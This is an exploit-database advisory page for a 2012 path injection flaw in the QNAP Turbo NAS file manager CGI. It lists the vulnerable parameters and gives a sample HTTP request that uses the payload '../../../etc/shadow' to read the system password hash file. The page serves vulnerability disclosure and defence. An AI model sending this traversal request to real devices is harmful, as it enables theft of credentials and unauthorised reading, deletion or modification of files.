header-logo
Suggest Exploit
vendor:
Turbo NAS
by:
Andrea Fabrizi
7,5
CVSS
HIGH
Path Injection
94
CWE
Product Name: Turbo NAS
Affected Version From: <= 3.7.3 build 20120801
Affected Version To: <= 3.7.3 build 20120801
Patch Exists: YES
Related CWE: N/A
CPE: o:qnap:ts-1279u-rp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QNAP TS-1279U-RP
2012

QNAP Turbo NAS Multiple Path Injection

This vulnerability has been discovered on QNAP TS-1279U-RP, but probably other products that use the same firmware may be affected. The CGI "/cgi-bin/filemanager/utilRequest.cgi" is prone to a path injection, which makes it possible, for authenticated users, to access, delete o modify any file, included system files, configuration files and files owned by other users. Due to the single user configuration of the embedded linux system, it is possible to access any system file without restrictions (included /etc/shadow, that contains the hash of the administrator password). Vulnerable parameters are (the list is not exhaustive): /cgi-bin/filemanager/utilRequest.cgi [source_file] /cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name] /cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path] /cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path] /cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name].

Mitigation:

Ensure that user input is properly validated and sanitized before being used in a filesystem operation.
Source

Exploit-DB raw data:

# Exploit Title: QNAP Turbo NAS Multiple Path Injection
# Date: 2012-09-04
# Exploit Author: Andrea Fabrizi
# Vendor Homepage: http://www.qnap.com/
# Version: <= 3.7.3 build 20120801
# Tested on: QNAP TS-1279U-RP

This vulnerability has been discovered on QNAP TS-1279U-RP, but probably
other products that use the same firmware may be affected.

The CGI "/cgi-bin/filemanager/utilRequest.cgi" is prone to a path
injection, which makes it possible,
for authenticated users, to access, delete o modify any file, included
system files, configuration files and
files owned by other users.

Due to the single user configuration of the embedded linux system, it
is possible to access
any system file without restrictions (included /etc/shadow, that
contains the hash of the administrator password).

Vulnerable parameters are (the list is not exhaustive):
/cgi-bin/filemanager/utilRequest.cgi [source_file]
/cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name]
/cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name]

Sample HTTP request:
###########################################################
POST /cgi-bin/filemanager/utilRequest.cgi/test.txt HTTP/1.1
Host: 192.168.0.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

isfolder=0&func=download&sid=12345abc&source_total=1&source_path=/myFiles&source_file=../../../etc/shadow
###########################################################

Navigation

Suggest Exploit

Services By CQR